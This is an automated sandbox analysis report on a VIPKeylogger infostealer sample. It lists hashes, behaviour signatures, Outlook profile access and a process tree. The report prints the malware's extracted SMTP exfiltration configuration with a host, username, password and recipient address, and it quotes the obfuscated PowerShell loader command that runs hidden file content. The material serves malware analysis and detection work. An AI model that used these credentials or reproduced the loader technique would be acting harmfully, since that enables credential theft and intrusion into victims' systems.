Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-01-2025 15:19
Static task
static1
Behavioral task
behavioral1
Sample
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
Resource
win10v2004-20241007-en
General
-
Target
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
-
Size
635KB
-
MD5
9eeaa6c9ce625021ac21b5eb40fb73e7
-
SHA1
459fa22834028579136aebd1327a6ff8b6e654cb
-
SHA256
6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739
-
SHA512
202fa2b529565bdf1e2691a12f3b91d5bc6303b5d926852048ed482a071491e8ecf98cc8be5fd1be743a82400db6a57f3ea4cbfd1eeb0586dcd508ba76b4dc50
-
SSDEEP
12288:lSDeMUQg8x4aKKnpDNsLXfzYoWg4IcQ9y3zf5ju9sis:SeMUQgUlNsvYoWdZtjBu/s
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 20 4884 msiexec.exe 22 4884 msiexec.exe 24 4884 msiexec.exe 26 4884 msiexec.exe 30 4884 msiexec.exe 46 4884 msiexec.exe 48 4884 msiexec.exe 53 4884 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 drive.google.com 20 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 checkip.dyndns.org 47 reallyfreegeoip.org 48 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4884 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1092 powershell.exe 4884 msiexec.exe -
pid Process 1092 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 1092 powershell.exe 4884 msiexec.exe 4884 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1092 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1092 powershell.exe Token: SeIncreaseQuotaPrivilege 1092 powershell.exe Token: SeSecurityPrivilege 1092 powershell.exe Token: SeTakeOwnershipPrivilege 1092 powershell.exe Token: SeLoadDriverPrivilege 1092 powershell.exe Token: SeSystemProfilePrivilege 1092 powershell.exe Token: SeSystemtimePrivilege 1092 powershell.exe Token: SeProfSingleProcessPrivilege 1092 powershell.exe Token: SeIncBasePriorityPrivilege 1092 powershell.exe Token: SeCreatePagefilePrivilege 1092 powershell.exe Token: SeBackupPrivilege 1092 powershell.exe Token: SeRestorePrivilege 1092 powershell.exe Token: SeShutdownPrivilege 1092 powershell.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeSystemEnvironmentPrivilege 1092 powershell.exe Token: SeRemoteShutdownPrivilege 1092 powershell.exe Token: SeUndockPrivilege 1092 powershell.exe Token: SeManageVolumePrivilege 1092 powershell.exe Token: 33 1092 powershell.exe Token: 34 1092 powershell.exe Token: 35 1092 powershell.exe Token: 36 1092 powershell.exe Token: SeDebugPrivilege 4884 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3728 wrote to memory of 1092 3728 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe 85 PID 3728 wrote to memory of 1092 3728 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe 85 PID 3728 wrote to memory of 1092 3728 6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe 85 PID 1092 wrote to memory of 4884 1092 powershell.exe 100 PID 1092 wrote to memory of 4884 1092 powershell.exe 100 PID 1092 wrote to memory of 4884 1092 powershell.exe 100 PID 1092 wrote to memory of 4884 1092 powershell.exe 100 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe"C:\Users\Admin\AppData\Local\Temp\6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4884
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
336KB
MD5b596c196381704f7d59a4284460fee40
SHA1e0283afd032563bdf7222ab654641e9ed3d4de05
SHA2565f12d49bdb6c38d8af460d2e3080c3e2c8753fdcd4ec1b0ae5e2299c12b65ffd
SHA512a26a937f73427c23c1955ce370b213e8bcc13bff394ff350499e8ee04a696aafa3ce3c7b801e5e4c0583583a7a161d7cf732466da3a24594f414086531f54d8c
-
Filesize
72KB
MD544086e4e4b931eb543dac505a3a4a2be
SHA19746b2ed0c33673a36aefcee2aa8a410dbd5a0f6
SHA2563cb5d810d9693dbc418e3e864c4ed8c24d6e674819315166125028ed98ee3ca9
SHA512613c00f10f1ad3df1e56a05c6a770376b6000d04335fa73880c8c91635380ea46382a65e721267a61b98c5f8497f750bc26cee2f6cb5a6db42701c7edd6c2722
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82